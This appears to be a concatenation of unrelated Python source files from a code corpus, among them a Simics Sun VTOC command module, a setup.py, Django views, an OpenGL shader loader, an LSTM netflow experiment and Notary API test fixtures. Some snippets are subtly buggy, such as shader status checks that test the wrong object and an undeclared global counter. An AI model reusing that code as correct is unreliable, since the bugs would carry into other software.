heads = get_vtoc_int16(vtoc, VTOC_HEADS)
s_per_t = get_vtoc_int16(vtoc, VTOC_TRACKS)
start = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr) * heads * s_per_t
blocks = get_vtoc_int32(vtoc, VTOC_PART_S1 + 8 * nbr + 4)
if blocks == 0:
print "No partition %d.\n" % nbr
return
print "Adding partition %d. Start block %d. Size in blocks: %d" % (nbr, start, blocks)
# index with list, since python doesn't have 4 bit indexes
files = obj.image.files
files += [[file, "ro", start * 512, blocks * 512]]
try:
obj.image.files = files
except Exception, msg:
print "Failed adding the diff file '%s' to image '%s'." % (file, obj.name)
print "Error message was: %s\n" % msg
return
print "Partition added.\n"
def tag_expander(string, obj):
return get_completions(string, tag_list.values())
def flag_expander(string, obj):
return get_completions(string, flag_list.values())
def create_sun_vtoc_commands(name):
new_command("print-sun-vtoc", print_sun_vtoc_cmd,
[],
alias = "",
type = "%s commands" % name,
short = "print the VTOC for a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'create-sun-vtoc-header',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-partition',
"<" + "%s" % name + '>.' + 'delete-sun-vtoc-partition'],
doc = """
Print the contents of the VTOC (volume table of contents) for a Sun
disk. This is similar to the Solaris 'prtvtoc' command.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="317")
new_command("create-sun-vtoc-header", write_sun_vtoc_cmd,
[arg(int_t, "C", "?", -1),
arg(int_t, "H", "?", -1),
arg(int_t, "S", "?", -1),
arg(flag_t, "-quiet")],
alias = "",
type = "%s commands" % name,
short = "write a new VTOC to a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-partition',
"<" + "%s" % name + '>.' + 'delete-sun-vtoc-partition'],
doc = """
Create and write a new VTOC to a Sun disk. The geometry information written is
taken from the configuration attribute 'geometry' of the disk, unless specified
with the <b>C</b>, <b>H</b> and <b>S</b> parameters. A new empty partition
table is also created, with only the standard 'backup' partition as number
2. <arg>-quiet</arg> makes the command silent in case of success.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="330")
new_command("create-sun-vtoc-partition", write_sun_vtoc_partition_cmd,
[arg(int_t, "number"),
arg(str_t, "tag", expander = tag_expander),
arg(str_t, "flag", expander = flag_expander),
arg(int_t, "start-block"),
arg(int_t, "num-blocks"),
arg(flag_t, "-quiet")],
alias = "",
type = "%s commands" % name,
short = "write partition data in the VTOC on a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-header',
"<" + "%s" % name + '>.' + 'delete-sun-vtoc-partition'],
doc = """
Write partition information to the VTOC on a Sun disk. This command does not
change the format of the disk, and it does not create any file system on the
partition. Only the 'Volume Table Of Contents' is modified. No checking is
performed to make sure that partitions do not overlap, or that they do not
exceed the disk size. <arg>-quiet</arg> makes the command silent in case of
success.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="349")
new_command("delete-sun-vtoc-partition", delete_sun_vtoc_partition_cmd,
[arg(int_t, "number"),
arg(flag_t, "-quiet")],
alias = "",
type = "%s commands" % name,
short = "delete partition data from the VTOC on a Sun disk",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-header',
"<" + "%s" % name + '>.' + 'create-sun-vtoc-partition'],
doc = """
Delete the information in the VTOC on a Sun disk for the specified partition.
No other modification on the disk is performed. <arg>-quiet</arg> makes the
command silent in case of success.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="371")
new_command("dump-sun-partition", dump_sun_partition_cmd,
[arg(int_t, "number"), arg(filename_t(), "file")],
alias = "",
type = "%s commands" % name,
short = "write partition as a file",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'print-sun-vtoc',
"<" + "%s" % name + '>.' + 'add-sun-partition'],
doc = """
Write all data from a Sun disk partition to the specified file in
raw format.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="387")
new_command("add-sun-partition", add_sun_partition_cmd,
[arg(int_t, "number"), arg(filename_t(), "file")],
alias = "",
type = "%s commands" % name,
short = "add partition from a file",
namespace = "%s" % name,
see_also = ["<" + "%s" % name + '>.' + 'dump-sun-partition'],
doc = """
Adds an image or diff as a sun partition to the current disk.
""", filename="/mp/simics-3.0/src/extensions/apps-python/sun_vtoc_commands.py", linenumber="399")
|
nilq/baby-python
|
python
|
import os
from pathlib import Path
from setuptools import find_packages, setup
def parse_req_file(fname, initial=None):
"""Reads requires.txt file generated by setuptools and outputs a
new/updated dict of extras as keys and corresponding lists of dependencies
as values.
The input file's contents are similar to a `ConfigParser` file, e.g.
pkg_1
pkg_2
pkg_3
[extras1]
pkg_4
pkg_5
[extras2]
pkg_6
pkg_7
"""
reqs = {} if initial is None else initial
cline = None
with open(fname, "r") as f:
for line in f.readlines():
line = line[:-1].strip()
if len(line) == 0:
continue
if line[0] == "[":
# Add new key for current extras (if missing in dict)
cline = line[1:-1]
if cline not in reqs:
reqs[cline] = []
else:
# Only keep dependencies from extras
if cline is not None:
reqs[cline].append(line)
return reqs
def get_version(fname):
"""Reads PKG-INFO file generated by setuptools and extracts the Version
number."""
res = "UNK"
with open(fname, "r") as f:
for line in f.readlines():
line = line[:-1]
if line.startswith("Version:"):
res = line.replace("Version:", "").strip()
break
if res in ["UNK", ""]:
raise ValueError(f"Missing Version number in {fname}")
return res
if __name__ == "__main__":
base_dir = os.path.abspath(os.path.dirname(Path(__file__)))
if not os.path.exists(
os.path.join(base_dir, "allenact.egg-info/dependency_links.txt")
):
# Build mode for sdist
os.chdir(os.path.join(base_dir, ".."))
with open(".VERSION", "r") as f:
__version__ = f.readline().strip()
# Extra dependencies for development (actually unnecessary)
extras = {
"dev": [
l.strip()
for l in open("dev_requirements.txt", "r").readlines()
if l.strip() != ""
]
}
else:
# Install mode from sdist
__version__ = get_version(os.path.join(base_dir, "allenact.egg-info/PKG-INFO"))
extras = parse_req_file(
os.path.join(base_dir, "allenact.egg-info/requires.txt")
)
setup(
name="allenact",
version=__version__,
description="AllenAct framework",
long_description=(
"AllenAct is a modular and flexible learning framework designed with"
" a focus on the unique requirements of Embodied-AI research."
),
classifiers=[
"Intended Audience :: Science/Research",
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
keywords=["reinforcement learning", "embodied-AI", "AI", "RL", "SLAM"],
url="https://github.com/allenai/allenact",
author="Allen Institute for Artificial Intelligence",
author_email="lucaw@allenai.org",
license="MIT",
packages=find_packages(include=["allenact", "allenact.*"]),
install_requires=[
"gym>=0.17.0,<0.18.0",
"torch>=1.6.0,!=1.8.0,<1.9.0",
"tensorboardx>=2.1",
"torchvision>=0.7.0,<0.10.0",
"setproctitle",
"moviepy>=1.0.3",
"filelock",
"numpy>=1.22.2",
"Pillow==9.0.1",
"matplotlib>=3.3.1",
"networkx==2.6",
"opencv-python",
"wheel>=0.36.2",
],
setup_requires=["pytest-runner"],
tests_require=["pytest", "pytest-cov", "compress_pickle"],
entry_points={"console_scripts": ["allenact=allenact.main:main"]},
extras_require=extras,
)
|
nilq/baby-python
|
python
|
import sys
from PyQt5 import QtWidgets
from gui import MainWindow
"""
Guitario, simple chord recognizer
All created MP4 files are stored in saved_accords directory
"""
if __name__ == '__main__':
print("Loading application!")
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName("Guitario")
app.setStyle("Fusion")
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
nilq/baby-python
|
python
|
from abc import ABC, abstractmethod
class MyAbstract(ABC):
def __init__(self):
pass
@abstractmethod
def doSomething(self):
pass
class MyClass1(MyAbstract):
def __init__(self):
pass
def doSomething(self):
print("abstract method")
def doSomethingElse(self):
print("abstract method 2")
c1 = MyClass1()
c1.doSomething()
c1.doSomethingElse()
|
nilq/baby-python
|
python
|
"""
Overrides the align-items value for specific flex items.
"""
from ..defaults import BREAKPOINTS, UP, DOWN, FULL, ONLY
from ...core import CssModule
vals = [
('fs', 'flex-start'),
('fe', 'flex-end'),
('c', 'center'),
('b', 'baseline'),
('s', 'stretch')
]
mdl = CssModule(
'Align self',
[FULL],
dynamic={'.as': ['align-self']},
values=vals,
docstring=__doc__
)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import sys
try:
import psycopg2
postgres = True
except:
import sqlite3
postgres = False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("You must supply the database name as the first argument")
sys.exit()
if postgres:
conn = psycopg2.connect(sys.argv[1])
c = conn.cursor()
c.execute("""CREATE TABLE admins
(
admin_id bigserial NOT NULL,
user_id integer NOT NULL,
level smallint NOT NULL DEFAULT 1,
CONSTRAINT admins_pkey PRIMARY KEY (admin_id),
CONSTRAINT admins_user_id_key UNIQUE (user_id)
);""")
c.execute("""CREATE TABLE posts_per_channel
(
post_id bigserial NOT NULL,
replyto_id integer,
channel_id integer NOT NULL,
message_id integer NOT NULL,
contenttype text,
contenttext text,
file_id text,
CONSTRAINT posts_per_channel_pkey PRIMARY KEY (post_id)
);""")
c.execute("""CREATE TABLE channels
(
channel_id bigserial NOT NULL,
channelname text NOT NULL,
channelurl text,
CONSTRAINT channels_pkey PRIMARY KEY (channel_id)
);""")
else:
conn = sqlite3.connect(sys.argv[1])
c = conn.cursor()
c.execute("""CREATE TABLE "channels" (
`channel_id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`channelname` TEXT NOT NULL,
`channelurl` TEXT NOT NULL UNIQUE
);""")
c.execute("""CREATE TABLE `posts_per_channel` (
`post_id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`replyto_id` INTEGER,
`channel_id` INTEGER NOT NULL,
`message_id` INTEGER NOT NULL,
`contenttype` TEXT NOT NULL,
`contenttext` TEXT NOT NULL,
`file_id` TEXT
);""")
c.execute("""CREATE TABLE `admins` (
`admin_id` INTEGER NOT NULL UNIQUE,
`user_id` INTEGER NOT NULL UNIQUE,
`level` INTEGER NOT NULL DEFAULT 1,
PRIMARY KEY(admin_id)
);""")
conn.commit()
conn.close()
|
nilq/baby-python
|
python
|
class Cache(object):
def __init__(self, j):
self.raw = j
if "beforeRequest" in self.raw:
self.before_request = CacheRequest(self.raw["beforeRequest"])
else:
self.before_request = None
if "afterRequest" in self.raw:
self.after_request = CacheRequest(self.raw["afterRequest"])
else:
self.after_request = None
if "comment" in self.raw:
self.comment = self.raw["comment"]
else:
self.comment = ''
class CacheRequest(object):
def __init__(self, j):
self.raw = j
if "expires" in self.raw:
self.expires = CacheRequest(self.raw["expires"])
else:
self.expires = None
self.last_access = self.raw["lastAccess"]
self.etag = self.raw["eTag"]
self.hit_count = self.raw["hitCount"]
if "comment" in self.raw:
self.comment = self.raw["comment"]
else:
self.comment = ''
|
nilq/baby-python
|
python
|
from OpenGL.GL import *
from OpenGL.GL.ARB import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
from OpenGL.GLUT.special import *
from OpenGL.GL.shaders import *
frame_count = 0
def pre_frame():
pass
def post_fram():
frame_count += 1
def disable_vsyc():
import glfw
glfw.swap_interval(0)
def enable_vsyc():
import glfw
glfw.swap_interval(1)
#return GLuint
def LoadShaders(vertex_file_path,fragment_file_path):
# Create the shaders
VertexShaderID = glCreateShader(GL_VERTEX_SHADER)
FragmentShaderID = glCreateShader(GL_FRAGMENT_SHADER)
# Read the Vertex Shader code from the file
VertexShaderCode = ""
with open(vertex_file_path,'r') as fr:
for line in fr:
VertexShaderCode += line
# alternatively you could use fr.readlines() and then join in to a single string
FragmentShaderCode = ""
with open(fragment_file_path,'r') as fr:
for line in fr:
FragmentShaderCode += line
# alternatively you could use fr.readlines() and then join in to a single string
# Compile Vertex Shader
print("Compiling shader: %s"%(vertex_file_path))
glShaderSource(VertexShaderID, VertexShaderCode)
glCompileShader(VertexShaderID)
# Check Vertex Shader
result = glGetShaderiv(VertexShaderID, GL_COMPILE_STATUS)
if not result:
raise RuntimeError(glGetShaderInfoLog(VertexShaderID))
# Compile Fragment Shader
print("Compiling shader: %s"%(fragment_file_path))
glShaderSource(FragmentShaderID,FragmentShaderCode)
glCompileShader(FragmentShaderID)
# Check Fragment Shader
result = glGetShaderiv(VertexShaderID, GL_COMPILE_STATUS)
if not result:
raise RuntimeError(glGetShaderInfoLog(FragmentShaderID))
# Link the program
print("Linking program")
ProgramID = glCreateProgram()
glAttachShader(ProgramID, VertexShaderID)
glAttachShader(ProgramID, FragmentShaderID)
glLinkProgram(ProgramID)
# Check the program
result = glGetShaderiv(VertexShaderID, GL_COMPILE_STATUS)
if not result:
raise RuntimeError(glGetShaderInfoLog(ProgramID))
glDeleteShader(VertexShaderID);
glDeleteShader(FragmentShaderID);
return ProgramID;
|
nilq/baby-python
|
python
|
# Create your tasks here
from __future__ import absolute_import, unicode_literals
from celery import shared_task
"""
@shared_task
def hello():
print("It's a beautiful day in the neighborhood")
"""
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import logging
import lecoresdk
def handler(event, context):
it = lecoresdk.IoTData()
set_params = {"productKey": "YourProductKey",
"deviceName": "YourDeviceName",
"payload": {"LightSwitch":0}}
res = it.setThingProperties(set_params)
print(res)
get_params = {"productKey": "YourProductKey",
"deviceName": "YourDeviceName",
"payload": ["LightSwitch"]}
res = it.getThingProperties(get_params)
print(res)
pub_params = {"topic": "/topic/hello",
"payload": "hello world"}
it.publish(pub_params)
print("publish success")
get_params = {"payload": [{"home":"123"}]}
res = it.getThingsWithTags(get_params)
print(res)
get_params = {"productKey": "YourProductKey",
"deviceName": "YourDeviceName",
"service":"upgrade",
"payload": {"LightSwitch": 0}}
res = it.callThingService(get_params)
print(res)
return 'hello world'
|
nilq/baby-python
|
python
|
from pathlib import Path
from cgr_gwas_qc.exceptions import GtcMagicNumberError, GtcTruncatedFileError, GtcVersionError
from cgr_gwas_qc.parsers.illumina import GenotypeCalls
def validate(file_name: Path):
try:
# Illumina's parser has a bunch of different error checks, so I am just
# using those to validate the file. However, I will throw custom errors
# for clarity.
GenotypeCalls(file_name.as_posix())
except Exception as err:
if err.args[0] == "GTC format error: bad format identifier":
raise GtcMagicNumberError
elif err.args[0] == "Unsupported GTC File version":
raise GtcVersionError
elif err.args[0] == "GTC file is incomplete":
raise GtcTruncatedFileError
else:
raise err
|
nilq/baby-python
|
python
|
from selenium import webdriver
#import time
#import unittest
browser = webdriver.Chrome()
browser.get('http://localhost:8000')
#unittest.TestCase.assertTrue(browser.get('http://localhost:8000'),msg='OK!')
assert 'The install worked successfully!' in browser.title
print('pass!')
browser.quit()
|
nilq/baby-python
|
python
|
# Django imports
from django.shortcuts import render
from django.core.urlresolvers import reverse_lazy
from django.views import generic as django_generic
from django.http import HttpResponse
from django.contrib import messages
# 3rd Party Package imports
from braces.views import LoginRequiredMixin
#Lackawanna Specific imports
from .models import Collection
from .forms import CollectionCreationForm
from datapoint.models import Datapoint
# REST API related imports
from rest_framework import generics as rest_generics, permissions, filters
from collection.serializers import CollectionSerializer
class CollectionList(rest_generics.ListAPIView):
queryset = Collection.objects.all()
serializer_class = CollectionSerializer
filter_fields = ('project', 'owner')
class CollectionReadUpdateDeleteView(rest_generics.RetrieveUpdateDestroyAPIView):
queryset = Collection.objects.all()
serializer_class = CollectionSerializer
class CollectionListView(LoginRequiredMixin, django_generic.ListView):
model = Collection
class CollectionCreateView(LoginRequiredMixin, django_generic.CreateView):
form_class = CollectionCreationForm
template_name = 'collection/collection_create.html'
success_message = "Collection created. Start adding datapoints to it using the 'Add to Collection' button in the datapoint viewer."
def form_valid(self, form):
form.instance.owner = self.request.user
messages.success(self.request, self.success_message)
return super(CollectionCreateView, self).form_valid(form)
def get_success_url(self):
return reverse_lazy('project:detail', kwargs={'slug': self.object.project.slug})
class CollectionUpdateView(LoginRequiredMixin, django_generic.UpdateView):
model = Collection
fields = ('owner', 'project', 'name', 'description',)
success_url = reverse_lazy('collection:list')
class CollectionDeleteView(LoginRequiredMixin, django_generic.DeleteView):
model = Collection
success_message = "Collection deleted successfully"
def delete(self, request, *args, **kwargs):
messages.success(self.request, self.success_message)
return super(CollectionDeleteView, self).delete(request, *args, **kwargs)
def get_success_url(self):
return reverse_lazy('project:detail', kwargs={'slug': self.object.project.slug})
class CollectionDetailView(LoginRequiredMixin, django_generic.DetailView):
template_name = 'collection/collection_detail.html'
model = Collection
def get_context_data(self, **kwargs):
context = super(CollectionDetailView, self).get_context_data(**kwargs)
context['datapoints'] = Datapoint.objects.filter(collections=self.get_object())
return context
class CollectionSettingsView(LoginRequiredMixin, django_generic.View):
template_name = 'collection/collection_settings.html'
model = Collection
def get_context_data(self, **kwargs):
context = super(CollectionSettingsView, self).get_context_data(**kwargs)
return context
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function
from .version import __version__
import __main__
try:
import etelemetry
etelemetry.check_available_version("incf-nidash/pynidm", __version__)
except ImportError:
pass
|
nilq/baby-python
|
python
|
import sys
import os
sys.path.append(os.path.join(os.getcwd(), 'deep_api'))
from deep_app import create_app
application = create_app()
if __name__ == '__main__':
application.run()
|
nilq/baby-python
|
python
|
"""
切片:定位多个元素
for number in range(开始,结束,间隔)
"""
message = "我是花果山水帘洞美猴王孙悟空"
# 写法1:容器名[开始: 结束: 间隔]
# 注意:不包含结束
print(message[2: 5: 1])
# 写法2:容器名[开始: 结束]
# 注意:间隔默认为1
print(message[2: 5])
# 写法3:容器名[:结束]
# 注意:开始默认为头
print(message[:5])
# 写法4:容器名[:]
# 注意:结束默认为尾
print(message[:])
message = "我是花果山水帘洞美猴王孙悟空"
# 水帘洞
print(message[5:8])
# 花果山水帘洞美猴王
print(message[2: -3])
# 空
print(message[1: 1])
# 是花果山水帘洞美猴王孙悟空
print(message[1: 100])
# 孙悟空
print(message[-3:])
print(message[:5])
# 特殊:空悟孙王猴美洞帘水山果花是我
print(message[::-1])
# 空孙猴洞水果是
print(message[::-2])
|
nilq/baby-python
|
python
|
from flask import request, make_response
import json
from themint import app
from themint.service import message_service
from datatypes.exceptions import DataDoesNotMatchSchemaException
@app.route('/', methods=['GET'])
def index():
return "Mint OK"
# TODO remove <title_number> below, as it is not used.
@app.route('/titles/<title_number>', methods=['POST'])
def post(title_number):
try:
message_service.wrap_message_for_system_of_record(request.json)
#app.logger.debug("Minting new title with payload %s" % (request.json))
return make_response(
json.dumps({
'message': 'OK',
'status_code': 201
}),
201)
except DataDoesNotMatchSchemaException as e:
app.logger.error('Validation error with data sent to mint %s' % e.field_errors)
return make_response(
json.dumps({
'error': e.field_errors
}), 400)
except Exception as e:
app.logger.error('Error when minting new', exc_info=e)
return make_response(
json.dumps({
'message': 'Error',
'status_code': 400
}),
400)
|
nilq/baby-python
|
python
|
import json
import os
os.environ['GIT_PYTHON_REFRESH'] = 'quiet'
from configparser import ConfigParser
import lstm_model as lm
from itertools import product
from datetime import datetime
import data_preprocess as dp
from sacred import Experiment
from sacred.observers import MongoObserver
ex = Experiment()
ex.observers.append(MongoObserver(url='mongodb://132.72.80.61/netflow_roman', db_name='netflow_roman'))
conf = ConfigParser()
conf.read('config.ini')
@ex.config
def my_config():
folder_name = conf.get('Paths', 'output_folder_name')
data_file = conf.get('Paths', 'data_file')
data_path = conf.get('Paths', 'data_path')
output_path = conf.get('Paths', 'output_path')
lstm_units = None
optimizer = None
loss = None
epochs = None
batch_size = None
n_steps = None
slide_len = None
repetitions = None
n_features = None
n_steps_out = None
l_rate = None
timestamp = None
rep = None
csv_logger = None
overflow_thresh = None
lstm_layers = None
use_mini_batches = None
@ex.main
def handle_netflow(data_path, data_file, folder_name, output_path, lstm_units, optimizer, loss, epochs,
batch_size, n_steps, n_features, slide_len, timestamp, rep, csv_logger, l_rate, n_steps_out,
overflow_thresh, lstm_layers, use_mini_batches):
if not os.path.exists(output_path + folder_name + '//' + str(int(timestamp))):
os.mkdir(output_path + folder_name + '//' + str(int(timestamp)))
X, y, dates_X, dates_y, all_data = dp.preprocess_netflow_data([data_path + data_file], n_steps, n_steps_out,
slide_len, 2, overflow_thresh)
lm.lstm_classification(batch_size, epochs, folder_name, loss, lstm_units, n_steps, optimizer, output_path, rep,
slide_len, timestamp, l_rate, n_steps_out, X, y, dates_X, dates_y, ex, lstm_layers, all_data,
use_mini_batches)
def main(folder_name, output_path, lstm_units_list, optimizers, losses, epochs_list,
batch_sizes, n_steps_list, n_features_list, slide_lens, repetitions, n_steps_out, l_rates,
overflow_thresholds, lstm_layers, use_mini_batches):
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
if not os.path.exists(output_path + folder_name):
os.mkdir(output_path + folder_name)
prod = product(lstm_units_list, optimizers, losses, epochs_list, batch_sizes, n_steps_list,
n_features_list, slide_lens, l_rates, n_steps_out, overflow_thresholds, lstm_layers)
for lstm_units, optimizer, loss, epochs, batch_size, n_steps, n_features, slide_len, l_rate, \
n_steps_out, overflow_thresh, n_lstm_layers in prod:
timestamp = datetime.timestamp(datetime.now())
for rep in range(repetitions):
ex.run(config_updates={'lstm_units': lstm_units, 'optimizer': optimizer, 'loss': loss, 'epochs': epochs,
'batch_size': batch_size, 'n_steps': n_steps, 'n_features': n_features,
'slide_len': slide_len, 'l_rate': l_rate, 'n_steps_out': n_steps_out,
'timestamp': timestamp, 'rep': rep, 'overflow_thresh': overflow_thresh,
'lstm_layers': n_lstm_layers, 'use_mini_batches': use_mini_batches})
lm.update_results_file(batch_size, epochs, folder_name, l_rate, loss, lstm_units, n_features,
n_steps, optimizer, output_path, repetitions, slide_len, timestamp, n_steps_out)
if __name__ == '__main__':
main(conf.get('Paths', 'output_folder_name'),
conf.get('Paths', 'output_path'),
json.loads(conf.get('LSTM', 'lstm_units')),
json.loads(conf.get('LSTM', 'optimizer')),
json.loads(conf.get('LSTM', 'loss')),
json.loads(conf.get('LSTM', 'epochs')),
json.loads(conf.get('LSTM', 'batch_size')),
json.loads(conf.get('LSTM', 'n_steps')),
json.loads(conf.get('LSTM', 'n_features')),
json.loads(conf.get('LSTM', 'slide_len')),
json.loads(conf.get('LSTM', 'repetitions')),
json.loads(conf.get('LSTM', 'look_forward')),
json.loads(conf.get('LSTM', 'l_rates')),
json.loads(conf.get('LSTM', 'overflow_threshold')),
json.loads(conf.get('LSTM', 'lstm_layers')),
conf.get('LSTM', 'use_mini_batches'))
|
nilq/baby-python
|
python
|
from PIL import Image
import os
from os.path import join
import scipy.io as sio
import matplotlib.pyplot as plt
import numpy as np
from scipy import ndimage
from Network import Network
from utils import plot_images , sigmoid , dsigmoid_to_dval , make_results_reproducible , make_results_random
make_results_reproducible()
current_dir = os.path.abspath(".")
data_dir = join(current_dir, 'data')
file_name = join(data_dir,"ex3data1.mat")
mat_dict = sio.loadmat(file_name)
# print("mat_dict.keys() : ",mat_dict.keys())
X = mat_dict["X"]
# print(f"X.shape : {X.shape}")
y = mat_dict["y"]
# make order random so test is ok because mnist is arrange
# such that each 500 samples are the same
indices = np.arange(len(y))
np.random.shuffle(indices)
X = X[indices]
y = y[indices]
m = y.size
# print(f"y.shape : {y.shape}")
Y = np.zeros((m,10))
# fix Y for logistic regression
for row,y_sample in enumerate(y):
if y_sample == 10:
# digit 0 is marked as 10 in y
Y[row,0]=1
else:
# digit 1-9 are marked as is y
Y[row,y_sample]=1
def plot_image(ax , sample,_X,_y):
image = _X[sample].reshape(20,20)
ax.set_title(f'image of X[{sample}] , y[{sample}][0] : {_y[sample][0]} ')
ax.imshow(image, cmap='gray')
def plots(_X,_y):
_ , axs = plt.subplots(2,2)
# pick a sample to plot
plot_image(axs[0,1],4300,_X,_y)
sample = 10
plot_image(axs[0,0],sample,_X,_y)
axs[1,0].set_title(f'X[{sample}]')
axs[1,0].grid()
axs[1,0].plot(_X[sample],'o')
axs[1,1].set_title('y')
axs[1,1].plot(_y,'o')
plt.show()
def compute_success_percentage(net,_X,_Y):
count_correct=0
error_indecis = []
i_sample=0
for x_sample , y_sample_fixed in zip(_X,_Y):
h = net.feedforward(x_sample)
i_max = np.argmax(h) # index of max probability
if y_sample_fixed[i_max] == 1:
count_correct += 1
else:
error_indecis.append(i_sample)
i_sample += 1
return (100*count_correct/len(_Y) , error_indecis)
def learn_nn(_X,_Y):
net = Network([400, 30 , 10],sigmoid , dsigmoid_to_dval)
epochs = 20
test_samples_percentage = 20
test_samples = int(m * (test_samples_percentage / 100))
traning_samples = m - test_samples
training_data = [(x_sample.reshape(x_sample.size,1),y_sample.reshape(y_sample.size,1)) for x_sample , y_sample in zip(_X[:traning_samples,:],_Y[:traning_samples,:])]
mini_batch_size = 1
learning_rate = 1
net.SGD(training_data, epochs, mini_batch_size, learning_rate)
(correct_test_percentage , error_test_indices) = \
compute_success_percentage(net,_X[-test_samples:,:],_Y[-test_samples:,:])
(correct_training_percentage , error_training_indices) = \
compute_success_percentage(net,_X[:traning_samples,:],_Y[:traning_samples,:])
return ((correct_test_percentage,error_test_indices) , \
(correct_training_percentage,error_training_indices))
def learning_curves_engine(samples_vec):
correct_trainings = []
correct_tests = []
for samples in samples_vec:
((correct_test_percentage ,_),(correct_training_percentage, _)) = \
learn_nn(X[:samples,:],Y[:samples,:])
correct_trainings.append(100 - correct_training_percentage)
correct_tests.append(100 - correct_test_percentage)
return (correct_trainings , correct_tests)
def learning_curves():
make_results_random() # it is a must
loops_for_mean = 5
samples_vec = [50 , 75, 100 , 200 , 500, 1000, 2000,5000]
np_correct_trainings = np.array([])
np_correct_tests = np.array([])
_ , (ax1, ax2 , ax3) = plt.subplots(3)
for i in range(loops_for_mean):
print(f"\n********* loop : {i+1} ***************\n")
correct_trainings , correct_tests = learning_curves_engine(samples_vec)
np_correct_trainings = np.append(np_correct_trainings,correct_trainings)
np_correct_tests = np.append(np_correct_tests,correct_tests)
ax1.plot(samples_vec,correct_tests)
ax1.set_title("test error [%]")
ax2.plot(samples_vec,correct_trainings)
ax2.set_title("traing error [%]")
np_correct_trainings = np_correct_trainings.reshape((loops_for_mean,len(samples_vec)))
np_correct_tests = np_correct_tests.reshape((loops_for_mean,len(samples_vec)))
ax3.plot(samples_vec,np_correct_trainings.mean(axis=0),'x')
ax3.plot(samples_vec,np_correct_tests.mean(axis=0),'o')
ax3.set_title("mean error [%] . training - x , test - o")
plt.tight_layout()
plt.show()
make_results_reproducible() # outside of this function i want reproducible
def get_samples_to_show(_indices , _images_in_row , _max_images_to_show):
possible_images = int(len(_indices) / _images_in_row) * _images_in_row
return min(possible_images , _max_images_to_show)
def learn(show_error_images=False):
_ , (ax1,ax2) = plt.subplots(2,1)
((correct_test_percentage,error_test_indices) , \
(correct_training_percentage,error_training_indices)) = learn_nn(X,Y)
print(f"percentage of correct estimations test : {correct_test_percentage}")
print(f"percentage of correct estimations training : {correct_training_percentage}")
if show_error_images:
images_in_row = 20
max_images_to_show = 100
image_height = 20
image_width = 20
show_training = get_samples_to_show(error_training_indices ,\
images_in_row , max_images_to_show)
show_test = get_samples_to_show(error_test_indices , \
images_in_row , max_images_to_show)
plot_images(ax1 ,images_in_row,image_height, \
image_width, error_training_indices[:show_training],X,y)
ax1.set_title(f"training error images. total error images : {len(error_training_indices)}")
plot_images(ax2 ,images_in_row,image_height, \
image_width, error_test_indices[:show_test],X,y)
ax2.set_title(f"test error images. total error images : {len(error_test_indices)}")
plt.show()
# plots(X,Y)
learn(True)
# learning_curves()
|
nilq/baby-python
|
python
|
import json
import re
import os
import pytest
import requests
import pytz
import datetime as dt
import connaisseur.trust_data
import connaisseur.notary_api as notary_api
from connaisseur.image import Image
from connaisseur.tuf_role import TUFRole
from connaisseur.exceptions import BaseConnaisseurException
@pytest.fixture
def napi(monkeypatch):
monkeypatch.setenv("IS_ACR", "0")
monkeypatch.setenv("SELFSIGNED_NOTARY", "1")
return notary_api
@pytest.fixture
def acrapi(monkeypatch):
monkeypatch.setenv("IS_ACR", "1")
monkeypatch.setenv("SELFSIGNED_NOTARY", "1")
return notary_api
@pytest.fixture
def mock_request(monkeypatch):
class MockResponse:
content: dict
headers: dict
status_code: int = 200
def __init__(self, content: dict, headers: dict = None, status_code: int = 200):
self.content = content
self.headers = headers
self.status_code = status_code
def raise_for_status(self):
pass
def json(self):
return self.content
def mock_get_request(**kwargs):
regex = (
r"https:\/\/([^\/]+)\/v2\/([^\/]+)\/([^\/]+\/)?"
r"([^\/]+)\/_trust\/tuf\/(.+)\.json"
)
m = re.search(regex, kwargs["url"])
if m:
host, registry, repo, image, role = (
m.group(1),
m.group(2),
m.group(3),
m.group(4),
m.group(5),
)
if "unhealthy" in kwargs["url"]:
return MockResponse({}, status_code=500)
if "health" in kwargs["url"]:
return MockResponse(None)
if "azurecr.io" in kwargs["url"]:
return MockResponse({"access_token": "d.e.f"})
if "token" in kwargs["url"]:
auth = kwargs.get("auth")
if "bad" in kwargs["url"]:
if "no" in kwargs["url"]:
return MockResponse({"nay": "butwhy"})
if "aint" in kwargs["url"]:
return MockResponse({}, status_code=500)
return MockResponse({"token": "token"})
elif auth:
return MockResponse({"token": f"BA.{auth.username}.{auth.password}a"})
return MockResponse({"token": "no.BA.no"})
elif registry == "auth.io" and not kwargs.get("headers"):
return MockResponse(
{},
{
"Www-Authenticate": (
'Bearer realm="https://core.harbor.domain/service/'
'token",service="harbor-notary",scope="repository:'
